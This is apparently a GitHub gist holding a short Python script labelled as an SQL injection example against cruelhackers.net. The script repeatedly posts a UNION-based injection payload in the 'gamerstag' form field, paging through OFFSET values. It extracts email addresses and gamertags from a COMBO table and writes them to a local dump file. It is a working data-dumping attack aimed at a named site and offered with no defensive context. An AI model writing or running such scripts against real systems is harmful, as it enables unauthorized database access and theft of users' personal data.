Created
November 20, 2016 08:40
-
-
Save mobeigi/c986172ab475e425201d5267e7c9cfd0 to your computer and use it in GitHub Desktop.
SQL injection example for cruelhackers.net
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, re, os | |
| START_NUM = 0 | |
| #Create dump file | |
| file = open('db_dump.txt', 'a+') | |
| count = 0 | |
| while True: | |
| payload = "junk' union select concat_ws(' ', EMAIL, GAMERSTAG) from COMBO LIMIT 999999 OFFSET " + str(START_NUM + count) + "#"; | |
| r = requests.post('http://cruelhackers.net/index.php', data = {'gamerstag': payload}) | |
| # If successful, add to file | |
| if r.status_code == 200: | |
| count = count + 1 | |
| try: | |
| data = re.search(r'<b>Email:</b>(.*)</p>', r.text).group(1) | |
| except Exception: | |
| print "Failed to find data on page." | |
| continue; | |
| # Gamer tags can contain spaces | |
| split = data.strip().split(" ") | |
| email = split[0] | |
| gamerstag = " ".join(split[1:]) | |
| file.write(gamerstag + '\t' + email + '\n') | |
| else: | |
| break; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment